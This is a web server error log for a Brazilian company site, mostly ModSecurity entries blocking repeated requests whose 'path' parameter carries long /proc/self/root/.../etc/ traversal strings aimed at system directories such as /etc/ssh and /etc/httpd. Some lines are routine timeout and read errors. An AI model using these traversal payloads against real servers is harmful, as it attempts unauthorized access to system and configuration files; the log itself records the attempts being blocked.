[Fri Mar 20 03:11:41.730951 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:50318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlHeoXxyEfFpUF8f9OiAAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:11:42.458517 2026] [mime_magic:error] [pid 26799:tid 140411607643904] (70014)End of file found: [client 57.141.18.60:58512] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:11:55.077845 2026] [proxy_fcgi:error] [pid 7893:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52512] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:11:56.308643 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.241.31:35660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlLOoXxyEfFpUF8f9OlwAAAUs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:12:05.927110 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:34718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlNfqxLDW4GITHUkStTQAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:12:11.352503 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:45934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlO_qxLDW4GITHUkStUgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:12:18.119006 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:55612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlQBCii7xarUs8iHYu_QAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:12:23.137865 2026] [proxy_fcgi:error] [pid 31215:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53600] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:12:33.073893 2026] [mime_magic:error] [pid 30424:tid 140411691570944] (70014)End of file found: [client 57.141.18.9:60358] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:12:33.540724 2026] [:error] [pid 30424:tid 140411624429312] [client 74.7.241.31:51060] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlUct36Dv4L1GW-s-ikgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:12:49.134846 2026] [proxy_fcgi:error] [pid 7893:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54638] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:13:13.125910 2026] [proxy_fcgi:error] [pid 8307:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55586] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:13:36.120468 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56548] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:13:36.367529 2026] [:error] [pid 30424:tid 140411540502272] [client 74.7.241.31:52270] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlkMt36Dv4L1GW-s-iwgAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:13:43.407130 2026] [:error] [pid 8307:tid 140411548894976] [client 74.7.241.31:52288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzll7-FhjpZGs9ba8qvvQAAAxc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:13:49.890540 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:58440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlnfqxLDW4GITHUkStpwAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:13:58.069887 2026] [proxy_fcgi:error] [pid 8307:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57382] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:14:02.360807 2026] [mime_magic:error] [pid 21219:tid 140411716749056] (70014)End of file found: [client 57.141.18.22:35808] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:14:20.130197 2026] [proxy_fcgi:error] [pid 7893:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58228] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:14:35.278214 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:58440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzly_qxLDW4GITHUkSt4AAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:14:36.883512 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:47274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlzPu8EFLIOrSqIpvqIQAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:14:39.335137 2026] [:error] [pid 30424:tid 140411574073088] [client 74.7.241.31:56942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlz8t36Dv4L1GW-s-i8QAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:14:40.720951 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] [client 94.72.107.34:40514] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/wp-login.php
[Fri Mar 20 03:14:41.124243 2026] [proxy_fcgi:error] [pid 21219:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58986] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:14:43.566865 2026] [:error] [pid 8307:tid 140411565680384] [client 74.7.241.31:56956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl07-FhjpZGs9ba8qv5wAAAxU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:14:43.779305 2026] [:error] [pid 8307:tid 140411699963648] [client 74.7.241.31:56956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl07-FhjpZGs9ba8qv6AAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:14:47.799109 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:35108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl1_u8EFLIOrSqIpvqLQAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:14:55.555487 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:57218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl3hCii7xarUs8iHYviwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:14:57.338417 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.241.31:56962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl4fXLqtnMIWvjpaJkmQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:00.523091 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:38024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl5AkwaGbbGflqUZAQAAAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:03.201784 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59742] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:15:14.601031 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:51554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl8ta6ubjKNq_cu4aZ4wAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:18.558324 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:51012] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzl9uoXxyEfFpUF8f9PHwAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:15:28.632153 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60652] AH01075: Error dispatching request to : (polling)
